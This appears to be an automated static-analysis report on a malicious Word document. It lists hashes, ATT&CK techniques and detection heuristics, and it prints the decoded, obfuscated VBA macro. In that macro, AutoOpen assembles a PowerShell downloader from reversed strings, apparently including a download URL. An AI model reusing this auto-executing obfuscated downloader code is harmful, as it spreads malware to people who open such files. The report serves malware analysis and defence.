Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 35de4cf3ed429504…

MALICIOUS

Office (OLE)

Size: 99.5 KB
Created: 2018-02-07 17:32:00
Authoring application: Microsoft Office Word
First seen: 2018-02-19
MD5: 0c2de7cca796f760be377d701485e5c1
SHA-1: 59a4dcd2dc8317e21e6e4a5bae5bf392656b0025
SHA-256: 35de4cf3ed429504e8b8695b33f386d2ca84017373af99b76f41d5df69f5f84c
Risk Score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment
  • T1203 Exploitation for Client Execution

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro uses a Shell() call, indicating an intent to execute arbitrary code. The ClamAV detection name 'Img.Dropper.PhishingLure-6443153-0' further supports its classification as a dropper or phishing lure. The VBA code is obfuscated, but the presence of the Shell() call together with the AutoOpen execution token strongly suggests it is designed to download and execute a secondary payload.

Heuristics (7)

  • ClamAV: Img.Dropper.PhishingLure-6443153-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 23605 bytes
SHA-256: 6be795f77d660fd42a2710ec2ec59a915af1e1d4d73df196e475110624afbaaf

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "MNSLzDj"
Sub AutoOpen()
On Error Resume Next
awSRWWnGK = raSWnhhMaUq - cSUUDzQFdXYqdf / (1331063 + YsTwGizpCc - 4647184 + iMolJbUzzBT)
qpFCUCbtI = JoiBtstUfSa - nWQimhBKHa / (4387316 + dHBjdmajPD - 4774817 + GkPjbiSisR)
CilmPurwT = RJXlqNrssrJj - sbBSSjcIofLFTu / (8280718 + jsRkpGzMds - 2660850 + aqBHSksKObYOq)
Application.Run "OqIsDVZfw", IrzXKGF
addMjWSAV = zszImioo - VpiziEmjBj / (1718008 + TCtOcTA - 9447452 + vmFiBPScGj)
ZnwtBsfwH = nQUMHfpGtJKnrD - CdTdoTHvzjQ / (4063473 + rWzVtCii - 3513038 + WWZMizWlwvTwP)
End Sub
Function IrzXKGF()
On Error Resume Next
sZXwf = JwVWuPqSTS - jojbRDpHBGiVb / (4028017 + jMTZdinlFz - 1456428 + mAQQKrZ)
ZawKpSzX = cjlapCC - SbatBWidwtoL / (8709811 + idKDDGl - 8116872 + iCQvwbtjbc)
GhpIDSkhOU = SdWNwPR - SRCNLZFHQmzv / (176323 + DwrlbmCFKNj - 8593558 + AGwEnpwXGboE)
pPZKSoaW = JQlRTMstsJo + Mid(StrReverse("MvRqaLLYEmWSTFjmVuqzlB)zl1zl1NiOj-'+']52'+',51,'+'4[cEpSMEHT+EHTOc:VNEFtv (. EHT((( )EHTEHTNIoj-]52,42,4[cepSMOc:VNEGJK (&'(( (xei JFhE"), 5, 109)
dNATpSAAP = NofkNGpiSp - ATiLGCD / (9567412 + CjGuibNlCs - 8673832 + fZqzKOKzmKm)
zuSFAt = nTJOQbzncGT - ikCltDbZwiUu / (8466529 + vntwhsua - 1441092 + SzVbvGwZF)
FmUNcvbn = RZLZFiiM - JwOWEfJtdYbl / (1417351 + nSuiAiqfvoh - 8977960 + cTszJirwQD)
KdcIci = rTdwbhzrZa + Mid(StrReverse("aLtVNo'+'+zl1+zl1lh5odnalEHT+E'+'HTh5+lh5rzl1+zl1 )GKlh5+lh5P'+'tEHT+EHTlh5+lh5GKlh5+lh5P+GKPcejbo-wlh5+lh5GKlEHZzUMGE"), 7, 106)
krzzPbYJ = LzihsdCa - JJhZkZSDPiXOR / (3419876 + siLvKJk - 4846264 + NhzaAzV)
dEQWulnGLAX = doHmDmjaL - uSArthioOR / (1388299 + iYkcMDarC - 3206649 + JlcKRpsb)
ZtzHSsTff = zoqHEVnRvL - DGOKiCaZjATS / (5699311 + qGRXNzWq - 7359327 + pidYrPIvq)
ZfQJfPn = RwlMUAiYKwX + Mid(StrReverse("wzvKulh5+EHT+EHTlh5szl1+zl1 + GKPk9lh5'+'+lhzlEHT+EHT1+zl15zl1+zl1VGKlh5'+'+l'+'h5Plh5zl1+zl1+l'+'h5 + cilh5+lh5lbup:vnezl1+zl1lh5+lzl1+zl1h529slh5+lh5 EHT+EHT= CDS29lh5+lh'+'5PWVQdoWpW"), 10, 171)
ARsrmjNiWWN = MwOOVuiMON - zVAZCiQsXb / (9591705 + njzwwlD - 8902920 + kSViKctON)
CcsdJBkN = RsjZwbpLkfc - vOvafWzk / (5078733 + SCNCiusF - 4239507 + KwjJEKCVJZT)
PzXbObOGsV = pcWHjjzXQ - EGajMuwuTiJ / (9622518 + zhlWVTcaArEMkj - 4465106 + IIwNhraj)
EdRRLrZwa = GDXRbOOSvUf + Mid(StrReverse("FcM5Nlh5+lh529s;tnlh5+lh5eilCbelh5+lh5W.lh5+lh5tzl1+zl1lh5+lh5eN.mlh5zl1+zl1+lh5etsyzl1+zl1lh5+lh5zl1+zl1S )GKlh5+lh5Ptlzl1+zl1h5+lh5clh5+l'+'h5elh5+EHT+EHTlh5jbo-GKP+GKlh5+lh5Plh5+lh5wGKHiEYWXmOPs"), 11, 184)
LzTFRRiB = zMbDnCEOVT - OZiKVLkPIHC / (9879867 + KELtCzVEJw - 2696088 + juafnMNDVuwjvT)
lYkzpZ = HPOSvNEtjqKMWw - FbUOoQKkUu / (7787986 + BQFfwiFNpufSic - 275548 + odArEwpWLhfcz)
YBPhawjGjt = tXGRDcdLMdQ - iKvBfMPTvruw / (8337537 + biUQDdQ - 2006092 + IMRYYNd)
wXBwnmq = wIYPGpErfW + Mid(StrReverse("KdnElllPjHORRU+]3,1[)(GNIrtzl1+zl1sOT.ECNerQuJBDUbn"), 9, 29)
GbwWV = iiBcJZABu - vZnUXJnpOnqFS / (5145935 + VYmwHLPkPm - 5301526 + jCrXXTmVwowsVo)
YtHZUSZZ = mfWYQbEoBO - mffoXiw / (2114552 + mWPSmfEc - 6416442 + tbTrcFtNKX)
ZizJwzvAAD = OpISjHqHRQw - jjQPDmlW / (5405622 + cViToCji - 3940905 + nfYhGAFXOUQJ)
MWXdmho = WbTQibJBS + Mid(StrReverse("qUAALTKS/zl1+zl1:pttlh5+lzl1+zl1h5hzl1+zl1?/lh5+lh56K53/moc.'+'4lh5+lh52ezig//lh5+lh5:ptthlhEHT+E'+'HT5+lh5 '+'zl1+zl1 lh5+lh5Glh5+lh5KPlh5+lh5 lh5+lh5= Xlh5+lhzl1+zl15CDA29slh5+lh5;lh5+lh5)3lh5+lh531282 zRR"), 3, 197)
HvNzljjA = TnYnvLWBI - IDjNHHqTZNjd / (8088914 + osLmfQUTMsEaw - 5592759 + kukCiilvM)
BQqYQuFEjni = sRtNajqzfwCAk - sOoqnIjLNF / (7799587 + waMKDzwsn - 9735298 + FlMOdQiKkJO)
SXpIvwTwv = PtuHDMhE - ZHkPlVuFBritn / (6782834 + buDuiuE - 1791439 + QwRIqvjGuljd)
CwUbzEiR = QmKMqpbZBzINno + Mid(StrReverse("bzMijJzwlh5EHT+EHT+lh5)lh5+lh5GKlh5+lh5'+'Plh5+lh5mEHT+EHTlh5+lh5etI-eGlh5+lh5KPE'+'HT+EHT+GKPkGKP+lh5+lh5GKlh5EHT+EHT+lh5Polh5+lh5vnlh5+lh5IGKP(&;)lh5+lh5CcqWMfOMdDzsJPv"), 15, 148)
... (truncated)